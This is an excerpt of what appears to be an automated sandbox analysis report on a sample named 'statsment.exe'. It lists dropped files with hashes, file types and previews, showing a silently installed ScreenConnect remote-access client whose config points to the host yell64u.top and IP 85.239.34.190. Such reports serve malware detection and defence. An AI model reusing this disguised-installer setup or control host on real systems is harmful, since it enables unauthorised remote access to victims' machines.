                                                                    Category:dropped
                                                                    Size (bytes):36864
                                                                    Entropy (8bit):4.340550904466943
                                                                    Encrypted:false
                                                                    SSDEEP:384:GqJxldkxhW9N5u8IALLU0X9Z1kTOPJlqE:GqJxl6xsPIA9COxlqE
                                                                    MD5:4717BCC62EB45D12FFBED3A35BA20E25
                                                                    SHA1:DA6324A2965C93B70FC9783A44F869A934A9CAF7
                                                                    SHA-256:E04DE7988A2A39931831977FA22D2A4C39CF3F70211B77B618CAE9243170F1A7
                                                                    SHA-512:BB0ABC59104435171E27830E094EAE6781D2826ED2FC9009C8779D2CA9399E38EDB1EC6A10C1676A5AF0F7CACFB3F39AC2B45E61BE2C6A8FE0EDB1AF63A739CA
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):57344
                                                                    Entropy (8bit):4.657268358041957
                                                                    Encrypted:false
                                                                    SSDEEP:768:BLNru62y+VqB4N5SBcDhDxW7ZkCmX2Qv1Sf0AQdleSBRxf+xUI3:BJ2yUGmh2O11AsleyRxf+xt
                                                                    MD5:A921A2B83B98F02D003D9139FA6BA3D8
                                                                    SHA1:33D67E11AD96F148FD1BFD4497B4A764D6365867
                                                                    SHA-256:548C551F6EBC5D829158A1E9AD1948D301D7C921906C3D8D6B6D69925FC624A1
                                                                    SHA-512:E1D7556DAF571C009FE52D6FFE3D6B79923DAEEA39D754DDF6BEAFA85D7A61F3DB42DFC24D4667E35C4593F4ED6266F4099B393EFA426FA29A72108A0EAEDD3E
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):176128
                                                                    Entropy (8bit):5.775360792482692
                                                                    Encrypted:false
                                                                    SSDEEP:3072:FkfZS7FUguxN+77b1W5GR69UgoCaf8TpCnfKlRUjW01Ky4:x+c7b1W4R6joxfQE
                                                                    MD5:5EF88919012E4A3D8A1E2955DC8C8D81
                                                                    SHA1:C0CFB830B8F1D990E3836E0BCC786E7972C9ED62
                                                                    SHA-256:3E54286E348EBD3D70EAED8174CCA500455C3E098CDD1FCCB167BC43D93DB29D
                                                                    SHA-512:4544565B7D69761F9B4532CC85E7C654E591B2264EB8DA28E60A058151030B53A99D1B2833F11BFC8ACC837EECC44A7D0DBD8BC7AF97FC0E0F4938C43F9C2684
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):548864
                                                                    Entropy (8bit):6.031251664661689
                                                                    Encrypted:false
                                                                    SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                                    MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                                    SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                                    SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                                    SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):11776
                                                                    Entropy (8bit):5.267782165666963
                                                                    Encrypted:false
                                                                    SSDEEP:192:TY8/Qp6lCJuV3jnXtyVNamVNG1YZfCrMmbfHJ7kjvLQbuLd9NEFbOhmX:Z/cBJaLXt2NaheUrMmb/FkjvLQbuZZmX
                                                                    MD5:5060FA094CE77A1DB1BEB4010F3C2306
                                                                    SHA1:93B017A300C14CEEBA12AFBC23573A42443D861D
                                                                    SHA-256:25C495FB28889E0C4D378309409E18C77F963337F790FEDFBB13E5CC54A23243
                                                                    SHA-512:2384A0A8FC158481E969F66958C4B7D370BE4219046AB7D77E93E90F7F1C3815F23B47E76EFD8129234CCCB3BCAC2AA8982831D8745E0B733315C1CCF3B1973D
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1721856
                                                                    Entropy (8bit):6.639136400085158
                                                                    Encrypted:false
                                                                    SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                    MD5:9F823778701969823C5A01EF3ECE57B7
                                                                    SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                    SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                    SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Process:C:\Users\user\Desktop\statsment.exe
                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {98F14B4D-F652-F7B9-4AEF-F8F43E2034FC}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug 13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                    Category:dropped
                                                                    Size (bytes):13422592
                                                                    Entropy (8bit):7.966820923160687
                                                                    Encrypted:false
                                                                    SSDEEP:196608:h53JLR3LGMLiW35j53JLR3LGMLt53JLR3LGMLH53JLR3LGML153JLR3LGMLE53Jd:bTiuZTXTtTPTkT3T
                                                                    MD5:7E20F46535D83264E94CA0F03D147867
                                                                    SHA1:96986D5F0CBCDE8141BA9A41721702154FF7B8C8
                                                                    SHA-256:307907BF34B356B6C6090428EE86BD9EA0E05C4165455403F2FC1BDF26AF6F9E
                                                                    SHA-512:3E05B66131708F2378061B4ED565DDD1D2DAF91FEC472FB28E2EE0403DD3EDFF017E64DCBBD28CA134F2B303A80345852785FE6D4248CF1B92068CF63908DA7A
                                                                    Malicious:false
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {98F14B4D-F652-F7B9-4AEF-F8F43E2034FC}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug 13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                    Category:dropped
                                                                    Size (bytes):13422592
                                                                    Entropy (8bit):7.966820923160687
                                                                    Encrypted:false
                                                                    SSDEEP:196608:h53JLR3LGMLiW35j53JLR3LGMLt53JLR3LGMLH53JLR3LGML153JLR3LGMLE53Jd:bTiuZTXTtTPTkT3T
                                                                    MD5:7E20F46535D83264E94CA0F03D147867
                                                                    SHA1:96986D5F0CBCDE8141BA9A41721702154FF7B8C8
                                                                    SHA-256:307907BF34B356B6C6090428EE86BD9EA0E05C4165455403F2FC1BDF26AF6F9E
                                                                    SHA-512:3E05B66131708F2378061B4ED565DDD1D2DAF91FEC472FB28E2EE0403DD3EDFF017E64DCBBD28CA134F2B303A80345852785FE6D4248CF1B92068CF63908DA7A
                                                                    Malicious:false
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {98F14B4D-F652-F7B9-4AEF-F8F43E2034FC}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug 13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                    Category:dropped
                                                                    Size (bytes):13422592
                                                                    Entropy (8bit):7.966820923160687
                                                                    Encrypted:false
                                                                    SSDEEP:196608:h53JLR3LGMLiW35j53JLR3LGMLt53JLR3LGMLH53JLR3LGML153JLR3LGMLE53Jd:bTiuZTXTtTPTkT3T
                                                                    MD5:7E20F46535D83264E94CA0F03D147867
                                                                    SHA1:96986D5F0CBCDE8141BA9A41721702154FF7B8C8
                                                                    SHA-256:307907BF34B356B6C6090428EE86BD9EA0E05C4165455403F2FC1BDF26AF6F9E
                                                                    SHA-512:3E05B66131708F2378061B4ED565DDD1D2DAF91FEC472FB28E2EE0403DD3EDFF017E64DCBBD28CA134F2B303A80345852785FE6D4248CF1B92068CF63908DA7A
                                                                    Malicious:false
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):431081
                                                                    Entropy (8bit):6.617533408935632
                                                                    Encrypted:false
                                                                    SSDEEP:6144:luH2aCGw1ST1wQLdqv5uH2aCGw1ST1wQLdqv/ssu:luH2anwohwQUv5uH2anwohwQUv/ssu
                                                                    MD5:B1BF38D2373B0759961C5C2E384AC60F
                                                                    SHA1:D83CFF608057EA47C3C44F7AF382928203E202ED
                                                                    SHA-256:3876FDC1A558630E0A6F184DD45D21C2C925853D6BE6A0746D7E44DF04DEBDA6
                                                                    SHA-512:2C9CEE510F0D22099998F8EAAAFAE34BE6EC135D46F0EF453C9AB1AAD9EDA9365A2E37441143A7FA0F5818828A70E953372451ED1C1E7B5E6728FDA82D835D34
                                                                    Malicious:false
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSID418.tmp, Author: Joe Security
                                                                    Preview:...@IXOS.@.....@...Y.@.....@.....@.....@.....@.....@......&.{98F14B4D-F652-F7B9-4AEF-F8F43E2034FC}'.ScreenConnect Client (de5851ad6e374ce3)..setup.msi.@.....@.....@.....@......DefaultIcon..&.{98F14B4D-F652-F7B9-4AEF-F8F43E2034FC}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (de5851ad6e374ce3)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{AF52190F-9138-8DD5-E284-9AF07DDE1216}^.C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll.@.......@.....@.....@......&.{5462DCDA-B5AB-15F8-7838-2A54948A34EB}f.C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsBackstageShell.exe.@.......@.....@.....@......&.{41277B46-8511-4FBD-DF82-7BFA9BAEED18}c.C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsFileManager.exe.@.......@.
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):207360
                                                                    Entropy (8bit):6.573348437503042
                                                                    Encrypted:false
                                                                    SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                    MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                    SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                    SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                    SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):207360
                                                                    Entropy (8bit):6.573348437503042
                                                                    Encrypted:false
                                                                    SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                    MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                    SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                    SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                    SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.1614974116863155
                                                                    Encrypted:false
                                                                    SSDEEP:12:JSbX72FjiSAGiLIlHVRpMh/7777777777777777777777777vDHF8+l7p3Xl0i8Q:JHQI5c9V6F
                                                                    MD5:685383AAC503450A56BE9C689FC62050
                                                                    SHA1:AB1E618889BE60DE712CD4BA15B3148F45BDA035
                                                                    SHA-256:09ED6CAF9AAE9F445828A63B0007736F88E88A22B91183CE71DA6CCB2965A861
                                                                    SHA-512:69AD78F33951FD6CC1FF5A20D60D7EA4AC0D165191B383C549912D672E9A174AC93BF38D0B1D9A44D9FD45426B1C879CB04A4490D4FDC19B02CA5C5F9F3C1216
                                                                    Malicious:false
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.7964183569782501
                                                                    Encrypted:false
                                                                    SSDEEP:48:I8PhDuRc06WX4unT5v9ptcqcq56AduNSiA9EdZq+ommXrz4ao8rmAduNSID:XhD1enTHppYfaEdwLmm34D
                                                                    MD5:5B8A65C0D429AA7ED5920066362E617B
                                                                    SHA1:6BABEEBFFA878BDBE934FB6214FA1B9E28845A1A
                                                                    SHA-256:C4F8E8799093B8B1FE276C988161422295B1E7E76CA49B6B05C10D49E7EBB0D9
                                                                    SHA-512:2FF13882D99608AD5B3CC97255F87377A80B4C030D7A8EB80A5219A51D4FE619B01E671529B717313F07324D89C43C4A1699DF1E1098507832EB5C7ABF3E1CF2
                                                                    Malicious:false
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:MS Windows icon resource - 3 icons, 16x16 with PNG image data, 45 x 45, 8-bit/color RGBA, non-interlaced, 4 bits/pixel, 32x32 with PNG image data, 45 x 45, 8-bit/color RGBA, non-interlaced, 4 bits/pixel
                                                                    Category:dropped
                                                                    Size (bytes):7668
                                                                    Entropy (8bit):7.864444854228408
                                                                    Encrypted:false
                                                                    SSDEEP:192:NN78fxDBmgwVRjuzFN78fxDBmgwVRjuzFN78fxDBmgwVRjuzc:NN78dB742N78dB742N78dB74d
                                                                    MD5:55A6B0132343F5FC425515F0E29A5A53
                                                                    SHA1:CC8FE5C184EBB14AD6D835D8E743F4FC2678CB10
                                                                    SHA-256:A6663FB9874ABA9B9C1958D2D17470B73E1C95621A503454B2D0F941F989EAA6
                                                                    SHA-512:4F57298141165351CCE82CCCD9CAE456591253C9BEB753645D92B73D933F8405CD22011FC0E8C488A2CD3D3B54C7AF327F2869432EE92C1C41B0F4474D6C6BE9
                                                                    Malicious:false
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):432221
                                                                    Entropy (8bit):5.37517640284146
                                                                    Encrypted:false
                                                                    SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgauo:zTtbmkExhMJCIpErZ
                                                                    MD5:AFB0173B8E32C30CE229371B4BC3E84B
                                                                    SHA1:0740AFE6BAC4F6597B59F686A6D61AA2C728CF03
                                                                    SHA-256:7DC3DFDC59D2D4DF6B7617D0C0BDDB294477065B1FEC26855CDD317179B1A640
                                                                    SHA-512:445C62681B9E48628EB2F90A1AC8BB1B07D038E893AB62F60E0452197D38876C4361934A0DCC93CE983739515FDC95440F0574B6E89D3B764E868E247F5A10A2
                                                                    Malicious:false
                                                                    Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                    Process:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:modified
                                                                    Size (bytes):556
                                                                    Entropy (8bit):5.040261494590824
                                                                    Encrypted:false
                                                                    SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOIUikv3a/vXbAa3xT:2dL9hK6E46YP6JvH
                                                                    MD5:F0E587BEE68CD5E58BE5B761EC5DAF1E
                                                                    SHA1:1FEB20282705BBD13DC61BAC088319C8FAB7E206
                                                                    SHA-256:3551A3A3424288DB55CBF98E12E5A06ABCAE07DECFA79B107192817C113BFF83
                                                                    SHA-512:96284D449251B221ADB6B3E1695E52F21331A8061FE504EFC00E140A701B74CE89CB88B60BE744647BD40401B44E8E98A13772215E908FD58D99F8AE940320F0
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>yell64u.top=85.239.34.190-13%2f12%2f2024%2002%3a13%3a06</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                    Process:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):556
                                                                    Entropy (8bit):5.040261494590824
                                                                    Encrypted:false
                                                                    SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOIUikv3a/vXbAa3xT:2dL9hK6E46YP6JvH
                                                                    MD5:F0E587BEE68CD5E58BE5B761EC5DAF1E
                                                                    SHA1:1FEB20282705BBD13DC61BAC088319C8FAB7E206
                                                                    SHA-256:3551A3A3424288DB55CBF98E12E5A06ABCAE07DECFA79B107192817C113BFF83
                                                                    SHA-512:96284D449251B221ADB6B3E1695E52F21331A8061FE504EFC00E140A701B74CE89CB88B60BE744647BD40401B44E8E98A13772215E908FD58D99F8AE940320F0
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>yell64u.top=85.239.34.190-13%2f12%2f2024%2002%3a13%3a06</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                    Process:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):1590
                                                                    Entropy (8bit):5.363907225770245
                                                                    Encrypted:false
                                                                    SSDEEP:48:MxHKQ71qHGIs0HKEHiYHKGSI6oPtHTHhAHKKkhHNpv:iq+wmj0qECYqGSI6oPtzHeqKkhtpv
                                                                    MD5:E88F0E3AD82AC5F6557398EBC137B0DE
                                                                    SHA1:20D4BBBE8E219D2D2A0E01DA1F7AD769C3AC84DA
                                                                    SHA-256:278AA1D32C89FC4CD991CA18B6E70D3904C57E50192FA6D882959EB16F14E380
                                                                    SHA-512:CA6A7AAE873BB300AC17ADE2394232E8C782621E30CA23EBCE8FE65EF2E5905005EFD2840FD9310FBB20D9E9848961FAE2873B3879FCBC58F8A6074337D5802D
                                                                    Malicious:false
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                    Category:dropped
                                                                    Size (bytes):32768
                                                                    Entropy (8bit):1.4184325623730678
                                                                    Encrypted:false
                                                                    SSDEEP:48:y4bu7M+xFX4NT5hUM9ptcqcq56AduNSiA9EdZq+ommXrz4ao8rmAduNSID:Db6OTX5ppYfaEdwLmm34D
                                                                    MD5:D1EBAFC2C24D7C07F864887B431383E2
                                                                    SHA1:937D62E399A004EE4399FAD792BC1BE6863AE87E
                                                                    SHA-256:CCFABDA3A7755623AD056B8673710DA4882470EFA6A5EA8B5847B42425C52B88
                                                                    SHA-512:A8CC4309DD4D9147AA15F4FF25B21680EDB21094CF4DEAB35704E7C87EFAF20E8ACA043AB65E84646E03047635ADDD6FAFC43991AAD09968C13037E9C5A8F48B
                                                                    Malicious:false
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):512
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3::
                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                    Malicious:false
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):512
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3::
                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                    Malicious:false
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                    Category:dropped
                                                                    Size (bytes):32768
                                                                    Entropy (8bit):1.4184325623730678
                                                                    Encrypted:false
                                                                    SSDEEP:48:y4bu7M+xFX4NT5hUM9ptcqcq56AduNSiA9EdZq+ommXrz4ao8rmAduNSID:Db6OTX5ppYfaEdwLmm34D
                                                                    MD5:D1EBAFC2C24D7C07F864887B431383E2
                                                                    SHA1:937D62E399A004EE4399FAD792BC1BE6863AE87E
                                                                    SHA-256:CCFABDA3A7755623AD056B8673710DA4882470EFA6A5EA8B5847B42425C52B88
                                                                    SHA-512:A8CC4309DD4D9147AA15F4FF25B21680EDB21094CF4DEAB35704E7C87EFAF20E8ACA043AB65E84646E03047635ADDD6FAFC43991AAD09968C13037E9C5A8F48B
                                                                    Malicious:false
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):69632
                                                                    Entropy (8bit):0.23294667264205554
                                                                    Encrypted:false
                                                                    SSDEEP:48:mDBAduNS3qcq56AduNSiA9EdZq+ommXrz4ao8rbx9p:AxpYfaEdwLmm34w
                                                                    MD5:AAAEE32F3E4DD00590171E4796903B45
                                                                    SHA1:123E957C848A93238841B1B073F0BADD1293B89F
                                                                    SHA-256:3332AEC52F681E226197FE453BFA469EC00A8A354A9ACB99F9446C59771B06BF
                                                                    SHA-512:483A568D48C410DEC4B7C2B321BB13D3C1E05696D79879222C96DA72B43F4CECA797CAAE3706314CD7C19EE531499AF8458EEBEFFC8BAE0D8018BF8F4F6E088F
                                                                    Malicious:false
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):512
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3::
                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                    Malicious:false
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                    Category:dropped
                                                                    Size (bytes):32768
                                                                    Entropy (8bit):1.4184325623730678
                                                                    Encrypted:false
                                                                    SSDEEP:48:y4bu7M+xFX4NT5hUM9ptcqcq56AduNSiA9EdZq+ommXrz4ao8rmAduNSID:Db6OTX5ppYfaEdwLmm34D
                                                                    MD5:D1EBAFC2C24D7C07F864887B431383E2
